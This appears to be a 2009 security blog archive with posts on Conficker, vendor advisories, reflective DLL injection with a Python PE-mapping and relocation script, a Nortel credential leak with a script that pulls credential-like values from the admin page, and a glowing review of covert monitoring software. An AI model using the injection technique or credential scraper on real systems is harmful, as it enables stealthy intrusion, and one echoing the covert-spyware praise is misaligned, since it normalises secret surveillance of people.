Software And Internet Blog
April 27, 2009

Surviving Conficker Worm

Conficker did not unleash a global attack like SQL Slammer, the worm that crippled much of the Internet within about 30 minutes. But that isn't because Conficker wasn't capable of it.

The fact is that crippling the Internet is not a smart business model. It is like showing your hand in poker. Right now there are somewhere between 3 million and 15 million computers compromised by Conficker. Both numbers are big, but the larger point is the range of the estimates: give or take 12 million PCs, nobody really knows how big the threat is. There are 12 million PCs that might be infected, or might not.

To unleash the global Conficker army in some sort of massive April Fool's Day prank that grinds the Internet to a halt just for the sake of doing so might have entertainment value, but it doesn't generate revenue. What it would do is help identify the compromised machines, enabling them to be cleaned and patched, and help wipe out the threat. The Conficker creators have a business interest in flying under the radar so they can live to fight, and profit, another day.

So nothing really happened on April 1st. Does that mean we can just forget Conficker ever existed and move on? Absolutely not. The fact that nothing visible happened on April 1st means that millions of PCs, somewhere between 3 million and 15 million, are still compromised with Conficker. They can send spam. They can host malware. They can be used in a botnet denial-of-service attack. They are a mercenary army of malicious PCs for hire.

April 21, 2009

HPSBMA02422 SSRT080146 rev.1

Filed under: System Security, News

HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

Release Date: 2009-04-20
Last Updated: 2009-04-20

Potential Security Impact:
Remote execution of arbitrary code, Denial of Service (DoS), unauthorized access

Source:
Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP StorageWorks Storage Mirroring. These vulnerabilities could be exploited remotely to execute arbitrary code, cause a Denial of Service (DoS), or gain unauthorized access.

References:
CVE-2009-0716, CVE-2009-0717, CVE-2009-0718

SUPPORTED SOFTWARE VERSIONS*:
ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring v5 prior to v5.1.1.1090.15

BACKGROUND

CVSS 2.0 Base Metrics
===============================================
Reference       Base Vector                     Base Score
CVE-2009-0716   (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
CVE-2009-0717   (AV:N/AC:L/Au:N/C:N/I:N/A:P)    5.0
CVE-2009-0718   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

The Hewlett-Packard Company thanks Zhenhua Liu, Junfeng Jia, and Xiaopeng Zhang of Fortinet's Fortiguard Global Security Research Team for reporting these vulnerabilities to security-alert (at) hp (dot) com.


Reflective Dll Injection

Filed under: System Security, News

Summary :
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) loader.

Introduction:
Under the Windows platform, library injection techniques, both local and remote, have been around for many years. Remote library injection as an exploitation technique was introduced in 2004 by Skape and JT. Their technique employs shellcode to patch the host process's ntdll library at run time and forces the native Windows loader to load a Dynamic Link Library (DLL) image from memory. As an alternative to this technique, Stephen Fewer presents Reflective DLL Injection.

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such, the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. Previous work in the security field on building PE file loaders includes the bo2k server by DilDog.

The main advantage of the library loading itself is that it is not registered in any way with the host system (no loader data structures, no module list entry) and as a result is largely undetectable at both a system and process level. When employed as an exploitation technique, Reflective DLL Injection requires a minimal amount of shellcode, further reducing its detection footprint against host- and network-based intrusion detection and prevention systems. Note that the mapped image is still present as private executable memory with no backing file, which is exactly what memory scanners look for; "not registered" is not the same as invisible.
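The loader that the library carries has to do the work the native Windows loader would otherwise do: copy the headers and sections from the file layout to their virtual addresses at whatever base the image landed on, then walk the base relocation table and patch every absolute address by the difference between the actual and preferred base. The script below is an added example, not Stephen Fewer's paper code or his ReflectiveLoader, and it shows only those two steps; import resolution, page protections and the DllMain call are left out. It runs against a 32-bit PE image constructed inline, so it needs neither Windows nor a real DLL; all offsets and constants are the published PE32 layout.

```python
"""Added example (not from the paper): map a PE32 image and apply .reloc fix-ups."""
import struct

IMAGE_BASE = 0x10000000          # preferred base recorded in the constructed optional header
FILE_ALIGN, SECTION_ALIGN = 0x200, 0x1000
DATA_RVA, RELOC_RVA = 0x1000, 0x2000
IMAGE_REL_BASED_ABSOLUTE = 0     # padding entry, ignored by loaders
IMAGE_REL_BASED_HIGHLOW = 3      # 32-bit absolute address: add the base delta


def build_test_image():
    """Constructed PE: a .data section whose first dword is an absolute pointer
    to the string that follows it, and a .reloc section fixing up that dword."""
    data = struct.pack("<I", IMAGE_BASE + DATA_RVA + 4) + b"reflect\0"
    reloc = struct.pack("<IIHH", DATA_RVA, 12,             # page RVA, block size
                        IMAGE_REL_BASED_HIGHLOW << 12 | 0,   # entry = type:4 | offset:12
                        IMAGE_REL_BASED_ABSOLUTE << 12)      # padding to a 4-byte boundary
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x2102)  # i386, 2 sections, DLL
    opt = struct.pack("<HBB9I6HIIIIHH4III", 0x10B, 0, 0,
                      0, 0, 0, 0, 0, 0, IMAGE_BASE, SECTION_ALIGN, FILE_ALIGN,
                      0, 0, 0, 0, 0, 0,
                      0, 0x3000, FILE_ALIGN, 0,              # SizeOfImage, SizeOfHeaders
                      0, 0, 0, 0, 0, 0, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[5] = (RELOC_RVA, len(reloc))                      # IMAGE_DIRECTORY_ENTRY_BASERELOC
    opt += b"".join(struct.pack("<II", *d) for d in dirs)

    def section(name, rva, raw_ptr, body):
        return struct.pack("<8sIIIIIIHHI", name, len(body), rva, FILE_ALIGN, raw_ptr,
                           0, 0, 0, 0, 0xC0000040)         # initialized data, read/write
    headers = (dos + b"PE\0\0" + file_hdr + opt
               + section(b".data", DATA_RVA, 0x200, data)
               + section(b".reloc", RELOC_RVA, 0x400, reloc))
    return headers.ljust(0x200, b"\0") + data.ljust(0x200, b"\0") + reloc.ljust(0x200, b"\0")


def reflective_map(image, new_base):
    """Lay the image out as it would be in memory and rebase it to new_base.
    Mirrors the map-and-relocate steps of a reflective loader; returns the buffer."""
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    image_base, = struct.unpack_from("<I", image, opt + 28)
    size_of_image, size_of_headers = struct.unpack_from("<II", image, opt + 56)
    reloc_rva, reloc_size = struct.unpack_from("<II", image, opt + 96 + 5 * 8)

    mem = bytearray(size_of_image)
    hdr = image[:size_of_headers]
    mem[:len(hdr)] = hdr                                    # headers first
    for i in range(nsec):                                   # then each section at its RVA
        rva, raw_size, raw_ptr = struct.unpack_from("<III", image, opt + opt_size + i * 40 + 12)
        chunk = image[raw_ptr:raw_ptr + raw_size]
        mem[rva:rva + len(chunk)] = chunk

    delta = (new_base - image_base) & 0xFFFFFFFF
    pos, end = reloc_rva, reloc_rva + reloc_size
    while pos < end:                                        # walk the relocation blocks
        page_rva, block_size = struct.unpack_from("<II", mem, pos)
        for off in range(pos + 8, pos + block_size, 2):
            entry, = struct.unpack_from("<H", mem, off)
            kind, offset = entry >> 12, entry & 0xFFF
            if kind == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if kind != IMAGE_REL_BASED_HIGHLOW:
                raise ValueError(f"relocation type {kind} not supported")
            target = page_rva + offset
            value, = struct.unpack_from("<I", mem, target)
            struct.pack_into("<I", mem, target, (value + delta) & 0xFFFFFFFF)
        pos += block_size
    return mem


def read_dword(mem, rva):
    return struct.unpack_from("<I", mem, rva)[0]


def pointed_string(mem, new_base, rva=DATA_RVA):
    """Follow the absolute pointer stored at rva; only works if rebasing was correct."""
    target = read_dword(mem, rva) - new_base
    if not 0 <= target < len(mem):
        raise ValueError("pointer does not land inside the mapped image")
    return mem[target:mem.index(b"\0", target)].decode()


if __name__ == "__main__":
    img = build_test_image()
    for base in (IMAGE_BASE, 0x7FF00000):
        mem = reflective_map(img, base)
        print(hex(base), hex(read_dword(mem, DATA_RVA)), pointed_string(mem, base))
```

Mapping at the preferred base leaves the pointer untouched; mapping at 0x7FF00000 rewrites it to 0x7FF01004, and only because of that fix-up does the pointer still resolve to the string. A real loader would next resolve the import directory (the loader in the paper locates kernel32 exports by hash for that), set section protections and call DllMain with DLL_PROCESS_ATTACH.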

April 16, 2009

Webmail bug puts 40m accounts in jeopardy

Filed under: System Security

A web-borne vulnerability lurking in a popular email application seriously compromised the security of 40 million accounts until it was fixed early last month, independent researchers said.

The flaw, in the Memova messaging application sold by a company known as Critical Path, is yet another testament to the power of XSS, or cross-site scripting, vulnerabilities. Combined with another bug, it allowed attackers to surreptitiously forward the email of millions of end users at some of Europe's biggest internet service providers.

"The attacker only needs to send a specially crafted email to his victim," independent researchers Rosario Valotta and Matteo Carli wrote in an advisory. "As soon as the victim opens the mail (no further interaction required) the forwarding settings of his webmail account are silently modified."

The researchers tested a proof-of-concept attack on Italian ISPs Tiscali, Libero (also known as Wind) and Virgilio (aka Telecom) and found all three to be vulnerable. Using Critical Path press releases announcing customer deployments, they say about a dozen other large ISPs also used Memova, including Vodafone, Virgin, T-Mobile, and Telefonica. All told, that’s 40 million combined users, they say.

Nortel Application Gateway 2000 Password Disclosure Vulnerability

Filed under: System Security

Vendor description:

The Application Gateway delivers practical, converged voice and data applications on Nortel IP phones that enable organizations to benefit more fully from IP telephony. The prepackaged, easy-to-learn, easy-to-use Voice Office applications help increase productivity and enhance organizational communications - without requiring any integration work. For the hospitality sector, the Guest Services applications provide additional services/features, generate revenue from advertising on the phone screen, and reduce the cost of operations by enabling guests to self serve. Custom development tools are also available to end customers for delivery of customized content to IP phones.

Vulnerability overview:

The Nortel Application Gateway provides an administration interface “Nortel Administration Tool powered by Citrix”. This interface responds with sensitive information to unauthorized users.

Vulnerability description:

The "Nortel Administration Tool powered by Citrix" can be accessed at the URL https://(server):3001/. The subframe https://(server):3001/adminDownloads.htm shows no content in the browser view. However, the HTML source of this frame contains sensitive information such as an administrative call server account:

<div id="call_server_host" value="10.11.12.13"></div> …
<div id="call_server_telnet_port" value="23"></div> …
<div id="call_server_user" value="admin123"></div>
<div id="call_server_pwd" value="hugo123"></div>

Proof of concept:

This vulnerability can be exploited with nothing more than a web browser (view the frame's source) or a web proxy; no authentication is required.
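Because the page renders blank, the leak is only visible in the source, and the quickest way to confirm it on a host you are authorised to test is to fetch the frame and look for value attributes on elements whose id or name suggests a credential. The script below is an added example, not part of the advisory; the HTML it scans is constructed from the advisory's sample (with one extra hidden input added to show that the check is not tied to the div pattern), the keyword list is the example's own choice, and the fetch helper assumes a self-signed certificate on port 3001.

```python
"""Added example (not from the advisory): find credential-like values in a page's source."""
import html
import re

# Constructed from the advisory's sample: an empty-looking frame whose source carries a login.
SAMPLE_HTML = """<html><body>
<div id="call_server_host" value="10.11.12.13"></div>
<div id="call_server_telnet_port" value="23"></div>
<div id="call_server_user" value="admin123"></div>
<div id="call_server_pwd" value="hugo123"></div>
<input type="hidden" name="snmp_community" value="public">
</body></html>"""

SENSITIVE = re.compile(r"(pwd|passw|pass\b|secret|user|community|token|credential)", re.I)
TAG = re.compile(r"<(\w+)([^>]*)>", re.S)
ATTR = re.compile(r'(\w[\w-]*)\s*=\s*"([^"]*)"')


def find_leaked_fields(page):
    """Return [(id_or_name, value)] for every element whose id/name looks
    credential-like and which carries a non-empty value attribute."""
    hits = []
    for _tag, attr_text in TAG.findall(page):
        attrs = {k.lower(): html.unescape(v) for k, v in ATTR.findall(attr_text)}
        label = attrs.get("id") or attrs.get("name")
        value = attrs.get("value", "")
        if label and value and SENSITIVE.search(label):
            hits.append((label, value))
    return hits


def fetch_admin_downloads(server, timeout=10):
    """Fetch the frame named in the advisory. Assumption: the appliance presents a
    self-signed certificate, so verification is disabled for this one request."""
    import ssl
    import urllib.request
    url = f"https://{server}:3001/adminDownloads.htm"
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    import sys
    page = fetch_admin_downloads(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HTML
    for label, value in find_leaked_fields(page):
        print(f"{label} = {value}")
```

Run with no arguments it scans the embedded sample and reports the user, password and community string but not the host or port; run with a hostname it fetches the real frame first. Because the field names in the leak are fixed (call_server_user, call_server_pwd), the same check can be dropped into a scheduled configuration audit to confirm the fix has been applied.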

April 12, 2009

Software Review - WebWatcher

Detailed Review

Because of its remote viewing capabilities, there is definitely a "wow" factor to WebWatcher. There is just something high-tech about being able to see what is being recorded from a remote location. On top of that, for anyone with limited access to the computer they are trying to record, this feature is a must-have. Couple this ability with WebWatcher's exceptional arsenal of monitoring tools, and it's easy to see why it is our Editor's Choice.

WebWatcher monitors almost everything including:

  • Emails (Both sent and received)
  • Instant Messages/Chats
  • Tracks all websites that are visited
  • Tracks all keystrokes typed on the computer
  • Takes screenshot pictures of the monitored computer so you can see graphics, etc.

WebWatcher is a well-rounded application that is capable of both monitoring and Internet filtering, and it has most of the features that you’d expect a serious monitoring application to contain. In addition to that, WebWatcher also offers industrial-grade invisibility. We dug in pretty deeply, and there was no visible trace of the software anywhere.

WebWatcher's interface is simple and easy to use, and even a computer novice should find that it only takes a few minutes to figure out how everything works. WebWatcher has a few advanced features that border on unnecessary, but for those who take the time to figure them out they're a nice addition. And since WebWatcher's interface is actually a website, searching through the recorded information for the interesting items is very easy. If you use the alert word system, you can save a lot of time by reading just the emails and messages that contain the words you are interested in. So, for instance, WebWatcher can display only the emails that contain specific words, or only the instant message conversations with a certain person. It makes finding what you are looking for very easy.

April 10, 2009

Windows Server 2008 R2 and Windows 7 - More Secure Together

Introduction

Windows Server 2008 R2 and the Windows 7 client were made for each other, and made to provide better and more secure computing when used together. DirectAccess is a new feature that allows Windows 7 users to establish a remote connection to the corporate network without a traditional VPN client, and Remote Workspace, along with Presentation Virtualization and Remote Desktop Gateway, can let users reach their company desktops from anywhere over an authenticated, encrypted channel. In this article, we will look at these and other features that make the Server 2008 R2/Windows 7 combination the best bet for organizations looking to improve the security of their Windows-based networks.

With the emphasis at Microsoft on trustworthy computing, each edition of the server and client operating systems gets more secure. Windows Server 2008, and especially its latest incarnation, R2, provides IT administrators with many built-in security mechanisms. However, securing the server is only half the battle. The client machine is often the target of exploitation, especially in today's mobile world, where users connect from laptops that leave the company premises and thus are not always under the full control of the IT department. If your organization needs a high level of security (and in the current compliance-mandated environment, who doesn't?), you should be planning ahead for the deployment of the Windows 7 client in combination with Windows Server 2008 R2 as soon after the Windows 7 release as possible. Let's look at some of the advanced security features you'll be able to take advantage of by doing so.

Note:
Many organizations make it a policy to wait for the first service pack before rolling out a new client OS. Should you wait for SP1 before you deploy Windows 7? The Gartner Group says no. “The first Service Pack for Windows 7 is not necessary for the operating system’s stability and security readiness.”

Get free blog up and running in minutes with Blogsome
Theme designed by B A Khan